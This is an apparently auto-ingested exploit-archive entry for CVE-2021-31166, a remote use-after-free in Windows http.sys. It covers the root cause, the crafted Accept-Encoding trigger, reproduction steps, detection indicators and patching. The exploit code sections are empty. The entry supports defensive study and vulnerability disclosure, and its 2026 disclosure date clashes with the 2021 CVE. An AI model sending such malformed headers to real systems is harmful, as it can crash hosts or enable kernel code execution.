HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2021-31166)
by Axel "0vercl0k" Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1 · 2026-05-15
- Severity
- Critical
- CVE
- CVE-2021-31166
- Category
- network
- Affected product
- Microsoft Windows HTTP Protocol Stack (http.sys)
- Affected versions
- Windows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory
- Disclosed
- 2026-05-15
- Patch status
- patched
References
Archive entry
intelseclab/poc-archiveMetadata
| Field | Value |
|---|---|
| Date Added | 2026-05-15 |
| Author / Researcher | Axel “0vercl0k” Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1 |
| CVE / Advisory | CVE-2021-31166 |
| Category | network |
| Severity | Critical |
| CVSS Score | 9.8 (CVSSv3.1) |
| Status | Weaponized |
| Tags | HTTP.sys, use-after-free, RCE, Windows, kernel, unauthenticated |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Microsoft Windows HTTP Protocol Stack (http.sys) |
| Versions Affected | Windows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory |
| Language / Platform | Python PoC targeting Windows HTTP.sys over HTTP |
| Authentication Required | No |
| Network Access Required | Yes |
Summary
CVE-2021-31166 is a remote use-after-free vulnerability in the Windows HTTP Protocol Stack (http.sys) that is reachable via crafted HTTP headers. The public PoC sends a malformed Accept-Encoding header to trigger unsafe list handling in the kernel HTTP parser path. Successful exploitation can lead to system crash and has remote code execution impact according to Microsoft’s advisory.
Vulnerability Details
Root Cause
The vulnerable code path in http!UlpParseContentCoding mishandles list ownership for parsed content-coding entries. A local list is moved into the request structure, but stale list linkage can still be freed on another path, causing use-after-free / list corruption behavior.
Attack Vector
A remote, unauthenticated attacker sends an HTTP request containing a crafted Accept-Encoding value (for example with malformed comma-separated codings) to a Windows service that uses http.sys.
Impact
- Remote kernel crash/denial-of-service (e.g.,
KERNEL_SECURITY_CHECK_FAILURE). - Potential remote code execution in the Windows kernel networking stack.
- Exposure of internet-facing Windows services that rely on
http.sys.
Environment / Lab Setup
OS: Attacker on Linux/macOS/Windows with Python 3
Target: Authorized vulnerable Windows 10/Windows Server host using HTTP.sys
Attacker: Any host with TCP connectivity to target HTTP service
Tools: python3, requests
Setup Steps
| |
Proof of Concept
Step-by-Step Reproduction
- Prepare an authorized vulnerable Windows system exposing an HTTP endpoint backed by
http.sys. - From an attacker machine, run the PoC with
--target <ip:port>. - The PoC sends a GET request with a crafted
Accept-Encodingheader. - Observe target instability/crash in vulnerable environments.
Exploit Code
See
cve-2021-31166.pyin this folder.
| |
Expected Output
<Response [400]>
Screenshots / Evidence
screenshots/— add authorized lab packet capture, request trace, and crash evidence.
Detection & Indicators of Compromise
- Repeated malformed Accept-Encoding headers such as trailing empty codings
- Sudden HTTP service disruption followed by host bugcheck/reboot
- Kernel crash signatures involving HTTP!UlFreeUnknownCodingList / UlpParseAcceptEncoding
SIEM / IDS Rule (example):
Alert on inbound HTTP requests where Accept-Encoding contains malformed trailing
commas/empty coding tokens and correlate with HTTP service crashes.
Remediation
| Action | Detail |
|---|---|
| Patch | Apply Microsoft May 2021 security updates for CVE-2021-31166 |
| Workaround | Restrict exposure of HTTP.sys-backed services and filter malformed headers at edge controls |
| Config Hardening | Segment critical Windows hosts, enable crash monitoring, and maintain rapid patch cadence |
References
- CVE-2021-31166
- Microsoft Security Update Guide
- Source Repository — 0vercl0k/CVE-2021-31166
- Discovering and exploiting a use-after-free in HTTP Protocol Stack (tweet/thread reference from repository)
Notes
Auto-ingested from https://github.com/0vercl0k/CVE-2021-31166 on 2026-05-15.
| |